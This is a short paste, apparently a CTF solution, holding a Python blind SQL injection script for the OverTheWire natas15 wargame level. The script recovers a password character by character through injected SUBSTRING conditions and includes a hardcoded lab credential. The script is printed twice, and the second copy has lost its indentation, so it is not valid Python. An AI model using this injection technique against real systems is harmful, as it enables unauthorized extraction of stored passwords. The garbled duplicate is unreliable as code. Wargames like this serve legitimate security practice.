Creased · December 4, 2017 21:37
diff --git a/exploit.py b/exploit.py
 import requests
 import re
 import sys

 # HTTP headers
 headers={
    'Authorization': 'Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==',
    'Accept-Language': 'en'
 }

 # Config
 length = 1024  # Assuming that we don't know password size (it'll stop before 1024)
 found = False  # We haven't found final string
 position = 1   # Current position for substring
 char = 0       # Current char to test with current position (char iterator)
 final = ''     # Final password

 while not found:
    data = {
        'username': 'natas16" AND ASCII(SUBSTRING(users.password,{position},1))={char} AND "a"="a'.format(position=position, char=char)
    }

    response = requests.post(
        'http://natas15.natas.labs.overthewire.org/index.php',
        data=data,
        headers=headers
    ).content

    result = re.search('This user exists.', str(response))

    # print('{final}{char}'.format(final=final, char=chr(char)))  # Print progress

    if result is not None:                        # If we get good response (blind test)
        print('{final}{char}'.format(final=final, char=chr(char)))  # Print progress

        if (position != length) and (char != 0):  # And we haven't reached the max length
            final += chr(char)                    # Append char to final string
            position += 1                         # Goto next char (substring position)
            char = 0                              # Reset char iterator
        else:
            final += chr(char)                    # Append char to final string 
            found = True                          # We have the final string
    else:
        char += 1                                 # We haven't the good char, try next from iterator

 print (repr('Flag: {}'.format(final)))
	import requests
	import re
	import sys

	# HTTP headers
	headers={
	'Authorization': 'Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==',
	'Accept-Language': 'en'
	}

	# Config
	length = 1024 # Assuming that we don't know password size (it'll stop before 1024)
	found = False # We haven't found final string
	position = 1 # Current position for substring
	char = 0 # Current char to test with current position (char iterator)
	final = '' # Final password

	while not found:
	data = {
	'username': 'natas16" AND ASCII(SUBSTRING(users.password,{position},1))={char} AND "a"="a'.format(position=position, char=char)
	}

	response = requests.post(
	'http://natas15.natas.labs.overthewire.org/index.php',
	data=data,
	headers=headers
	).content

	result = re.search('This user exists.', str(response))

	# print('{final}{char}'.format(final=final, char=chr(char))) # Print progress

	if result is not None: # If we get good response (blind test)
	print('{final}{char}'.format(final=final, char=chr(char))) # Print progress

	if (position != length) and (char != 0): # And we haven't reached the max length
	final += chr(char) # Append char to final string
	position += 1 # Goto next char (substring position)
	char = 0 # Reset char iterator
	else:
	final += chr(char) # Append char to final string
	found = True # We have the final string
	else:
	char += 1 # We haven't the good char, try next from iterator

	print (repr('Flag: {}'.format(final)))